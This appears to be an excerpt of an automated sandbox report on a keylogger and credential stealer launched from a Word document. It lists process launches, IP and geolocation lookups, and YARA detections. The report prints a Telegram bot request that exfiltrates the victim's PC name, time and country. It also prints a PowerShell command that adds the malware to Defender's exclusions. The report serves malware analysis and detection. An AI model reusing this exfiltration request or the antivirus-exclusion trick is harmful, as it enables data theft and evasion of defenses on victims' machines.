                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.22 | 49177 | 193.122.130.0 | 80 | 3512 | C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe
Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 08:20:04.880839109 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.22 | 49178 | 193.122.6.168 | 80 | 3512 | C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe
Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 08:20:13.417202950 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
Oct 30, 2024 08:20:14.253120899 CET | 323 | IN | HTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:20:14 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: e7e1458ba2a47a09baed452a107b3425
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>
Oct 30, 2024 08:20:14.462519884 CET | 323 | IN | HTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:20:14 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: e7e1458ba2a47a09baed452a107b3425
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                          0 | 192.168.2.22 | 49163 | 188.114.96.3 | 443 | 3512 | C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe
                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                          2024-10-30 07:19:49 UTC | 87 | OUT | GET /xml/173.254.250.78 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-10-30 07:19:49 UTC | 885 | IN | HTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:19:49 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 359
                                                                                                          Connection: close
                                                                                                          apigw-requestid: AcLvmhW3vHcESEw=
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 20812
                                                                                                          Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IY5JetjhKLFOhD43x7bb0w5hMXuDVpcYrDui3HqS%2FCRN9zWR3ty4j0t96wYZ3KWenLyBqZcU474h%2F9nHrhZ4VAZNj9Gwpl8srjvmfN%2BtGdqikIjQgbzhQoJ0AfY39vd9mizLCTUL"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8da9a3a68fdc6c6b-DFW
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1057&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2758095&cwnd=234&unsent_bytes=0&cid=ef224848fe82c6f4&ts=267&x=0"
                                                                                                          2024-10-30 07:19:49 UTC | 359 | IN
                                                                                                          Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                          1 | 192.168.2.22 | 49164 | 188.114.96.3 | 443 | 3512 | C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe
                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                          2024-10-30 07:19:50 UTC | 63 | OUT | GET /xml/173.254.250.78 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          2024-10-30 07:19:50 UTC | 895 | IN | HTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:19:50 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 359
                                                                                                          Connection: close
                                                                                                          apigw-requestid: AcLvmhW3vHcESEw=
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 20813
                                                                                                          Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GPjJS%2F9w1%2BbnDcIRq1NFcC8YFQiNp6ejjYH7sk3G4%2FqvZRJr8QilYU2C8Kb0KaF2%2FmugmBLjUo0FfZ9SXHYTXmt4VrdzwVTKkLRh%2FPIR7UHA%2FYL7kmmn7%2BFXrzbMhAu8Uvq2xZ%2Bg"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8da9a3ad78ed2e2a-DFW
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1384&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1947545&cwnd=234&unsent_bytes=0&cid=8600ba0a29855f84&ts=150&x=0"
                                                                                                          2024-10-30 07:19:50 UTC | 359 | IN
                                                                                                          Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                          2 | 192.168.2.22 | 49166 | 188.114.97.3 | 443 | 3512 | C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe
                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                          2024-10-30 07:19:53 UTC | 87 | OUT | GET /xml/173.254.250.78 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-10-30 07:19:53 UTC | 887 | IN | HTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:19:53 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 359
                                                                                                          Connection: close
                                                                                                          apigw-requestid: AcLvmhW3vHcESEw=
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 20816
                                                                                                          Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lzu2%2FXEdKarNe3Ag3yuUoXp%2BUshp4sH98VZ7VuSF3F2I16UJ5jHG7m1aoyGRsmeVyAE1rMcvvcbLcAgTy8MomkJZuaRkZP%2FIE5G6MskJ1t61JjDE42Z2d21Kt%2F7jWcUzDek5LXxp"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8da9a3bd38844867-DFW
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1921&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=1509906&cwnd=242&unsent_bytes=0&cid=cac7cb348390c38b&ts=153&x=0"
                                                                                                          2024-10-30 07:19:53 UTC | 359 | IN
                                                                                                          Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                          3 | 192.168.2.22 | 49168 | 188.114.97.3 | 443 | 3512 | C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe
                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                          2024-10-30 07:19:54 UTC | 63 | OUT | GET /xml/173.254.250.78 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          2024-10-30 07:19:55 UTC | 893 | IN | HTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:19:55 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 359
                                                                                                          Connection: close
                                                                                                          apigw-requestid: AcLvmhW3vHcESEw=
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 20818
                                                                                                          Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N7tPookADIuCd7sMZU%2BY9Mri%2BlCSJ%2BDvPAkmTgM41MAELXJOxr4eOtdJDQNr1q9%2ByWiTkxdxvd9P1RyPY%2Fj9J9Nruh0%2F1fFKieBBbUzALtmrCdQRAsQsPg%2FC4bqA4DoyC19IxGyU"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8da9a3c8c90628e6-DFW
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1311&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2169288&cwnd=251&unsent_bytes=0&cid=ad4be3d01843ed58&ts=152&x=0"
                                                                                                          2024-10-30 07:19:55 UTC | 359 | IN
                                                                                                          Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                          4 | 192.168.2.22 | 49170 | 188.114.97.3 | 443 | 3512 | C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe
                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                          2024-10-30 07:19:56 UTC | 63 | OUT | GET /xml/173.254.250.78 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          2024-10-30 07:19:56 UTC | 887 | IN | HTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:19:56 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 359
                                                                                                          Connection: close
                                                                                                          apigw-requestid: AcLvmhW3vHcESEw=
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 20819
                                                                                                          Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BlTlr2biWBzpzYHK9PBvFNoPyeIKO0DWCAZV0PwH%2FntQgB4sz7xTUtLrZMRlwt%2BSEpuIKifTCILq75mxT7dvfuSqdkb518Qwp%2B8TlS1PMWDOpGtl9vlmqZ26Yl4XxIqkZO6zQiaC"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8da9a3d47b446b56-DFW
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1917&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=1585980&cwnd=251&unsent_bytes=0&cid=ad0c81db9a2a7aa5&ts=152&x=0"
                                                                                                          2024-10-30 07:19:56 UTC | 359 | IN
                                                                                                          Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                          5 | 192.168.2.22 | 49172 | 188.114.96.3 | 443 | 3512 | C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe
                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                          2024-10-30 07:19:58 UTC | 63 | OUT | GET /xml/173.254.250.78 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          2024-10-30 07:19:58 UTC | 884 | IN | HTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:19:58 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 359
                                                                                                          Connection: close
                                                                                                          apigw-requestid: AcLvmhW3vHcESEw=
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 20821
                                                                                                          Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yPauAqjzvMSea1Pn5bpAa%2B6LtRJSjvEOmISwB5bPApXJHFP7FDx7ETAxkgxfZ0xEli5pft3XsM5enouzfXSGbD2rxDNt%2FzFWncgZTlf3crFmqtJpwC20qWsr7%2Fx93XkyXqx9nure"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8da9a3ddcef24600-DFW
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=957&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2828125&cwnd=251&unsent_bytes=0&cid=81ecdb6599563a84&ts=165&x=0"
                                                                                                          2024-10-30 07:19:58 UTC | 359 | IN
                                                                                                          Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                          6 | 192.168.2.22 | 49174 | 188.114.96.3 | 443 | 3512 | C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe
                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                          2024-10-30 07:20:00 UTC | 87 | OUT | GET /xml/173.254.250.78 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-10-30 07:20:00 UTC | 891 | IN | HTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:20:00 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 359
                                                                                                          Connection: close
                                                                                                          apigw-requestid: AcLvmhW3vHcESEw=
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 20823
                                                                                                          Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EhdH5hApcbD4FCr5Hfx0udMefc38yNDnANIAw%2Fne82mM%2BLFRxaD%2BpvRTeGlJEHK7CRdqJ5Udgt6LQrpnTHzoQOztOxtcBxBLZI%2F8pD398PpDMfSpfKCcCJ%2BJPGipP%2FutP5Yb58Wj"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8da9a3e8cfd446de-DFW
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1202&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2477331&cwnd=246&unsent_bytes=0&cid=3b16ed40c4529d93&ts=153&x=0"
2024-10-30 07:20:00 UTC | 359 | IN | Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.22 | 49176 | 188.114.96.3 | 443 | 3512 | C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-30 07:20:04 UTC | 87 | OUT | GET /xml/173.254.250.78 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          Connection: Keep-Alive
2024-10-30 07:20:04 UTC | 889 | IN | HTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:20:04 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 359
                                                                                                          Connection: close
                                                                                                          apigw-requestid: AcLvmhW3vHcESEw=
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 20827
                                                                                                          Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FZvJZ2rcvv%2F5Q9j0hnlDwJzopzYsIibFe4KRvzQgxAdeqlvKrmZhi0%2B%2Bx4PZkBZTak7JZnPZOPMTpoRnWpek6YGnjp5UKLe1yAMuj4JPDs%2BDvGR44MedwJqAp%2B4WakFIXudVEqs0"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8da9a405ccc5e702-DFW
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2211&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1332106&cwnd=251&unsent_bytes=0&cid=d4351dcde4d34a2d&ts=156&x=0"
2024-10-30 07:20:04 UTC | 359 | IN | Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.22 | 49179 | 188.114.96.3 | 443 | 3512 | C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-30 07:20:14 UTC | 63 | OUT | GET /xml/173.254.250.78 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
2024-10-30 07:20:15 UTC | 881 | IN | HTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:20:14 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 359
                                                                                                          Connection: close
                                                                                                          apigw-requestid: AcLvmhW3vHcESEw=
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 20837
                                                                                                          Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8GXYmSc0qtxXrrlGEYGasAQsduA0PUbJM4VIfcMRT63N6RnwhGmhwVLeIKPJcE62h1HaVKBR%2Bvb29VjQTROsDBkvDLDySkM9z8xbgqA5nBi1PnIgXp1LOIoP9HQjp6zZnEaHfTfj"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8da9a4459bc3e863-DFW
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2086&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1352638&cwnd=236&unsent_bytes=0&cid=a5ace9a134ea10e8&ts=160&x=0"
2024-10-30 07:20:15 UTC | 359 | IN | Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.22 | 49180 | 149.154.167.220 | 443 | 3512 | C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-30 07:20:15 UTC | 354 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20and%20Time:%2010/30/2024%20/%2010:40:52%20PM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20960781%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                          Host: api.telegram.org
                                                                                                          Connection: Keep-Alive
2024-10-30 07:20:16 UTC | 344 | IN | HTTP/1.1 404 Not Found
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Wed, 30 Oct 2024 07:20:16 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 55
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-30 07:20:16 UTC | 55 | IN | Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}



                                                                                                          Target ID:0
                                                                                                          Start time:03:19:36
                                                                                                          Start date:30/10/2024
                                                                                                          Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                                                                          Imagebase:0x13f9b0000
                                                                                                          File size:1'423'704 bytes
                                                                                                          MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:false

                                                                                                          Target ID:2
                                                                                                          Start time:03:19:37
                                                                                                          Start date:30/10/2024
                                                                                                          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                                          Imagebase:0x400000
                                                                                                          File size:543'304 bytes
                                                                                                          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:5
                                                                                                          Start time:03:19:41
                                                                                                          Start date:30/10/2024
                                                                                                          Path:C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe"
                                                                                                          Imagebase:0xe80000
                                                                                                          File size:787'968 bytes
                                                                                                          MD5 hash:879B4E39A671B826E59EE54A75714CC7
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.407925121.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000005.00000002.407925121.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.407925121.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.407925121.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                          Antivirus matches:
                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                          • Detection: 67%, ReversingLabs
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          Target ID:6
                                                                                                          Start time:03:19:42
                                                                                                          Start date:30/10/2024
                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe"
                                                                                                          Imagebase:0xfc0000
                                                                                                          File size:427'008 bytes
                                                                                                          MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:7
                                                                                                          Start time:03:19:42
                                                                                                          Start date:30/10/2024
                                                                                                          Path:C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe"
                                                                                                          Imagebase:0xe80000
                                                                                                          File size:787'968 bytes
                                                                                                          MD5 hash:879B4E39A671B826E59EE54A75714CC7
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.910514133.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000007.00000002.910514133.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.910514133.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
